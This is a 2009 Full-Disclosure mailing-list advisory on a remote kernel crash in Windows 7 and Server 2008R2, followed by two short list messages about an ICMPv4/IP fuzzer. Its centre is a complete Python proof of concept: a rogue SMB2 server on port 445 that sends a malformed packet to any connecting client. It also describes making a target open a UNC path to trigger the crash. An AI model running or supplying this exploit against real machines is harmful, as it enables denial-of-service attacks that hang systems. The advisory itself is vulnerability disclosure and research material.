I. VULNERABILITY
-
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
445
launch.serve_forever()

#SDL FAILED

V. BUSINESS IMPACT
-
An attacker can remotly crash any Windows 7/Server 2008R2.


VI. SYSTEMS AFFECTED
-
Windows 7, Windowns Server 2008R2

VII. SOLUTION
-
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-
http://blogs.msdn.com/sdl/
http://g-laurent.blogspot.com/
http://twitter.com/g_laurent
IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug
shouldn't appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-
More Remote Kernel FD @MS to come.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ICMPv4/IP fuzzer prototype.

[laurent gaffie]

Should be kweel for UTesting
http://g-laurent.blogspot.com/2009/11/releasing-icmpv4ip-fuzzer-prototype.html

Enjoy.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fwd: ICMPv4/IP fuzzer prototype.

[laurent gaffie]

Hell no
 random.randrang -> randrange(_) rtfm.

and yeah u'r welcome.


2009/11/23 Andrew Farmer 

On 22 Nov 2009, at 19:48, laurent gaffie wrote:
> > Should be kweel for UTesting
> >
> http://g-laurent.blogspot.com/2009/11/releasing-icmpv4ip-fuzzer-prototype.html
> ...
> > Dont forget it's a prototype, and i ASSUME you know what you're doing, do
> not ask for help.
>
> You definitely have to know what you're doing to run the code, as posting
> that to Blogspot has destroyed the indentation. :)
>
> Also, random.randrange(...) is going to give you much better performance
> than random.choice(range(...)). Just sayin'.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/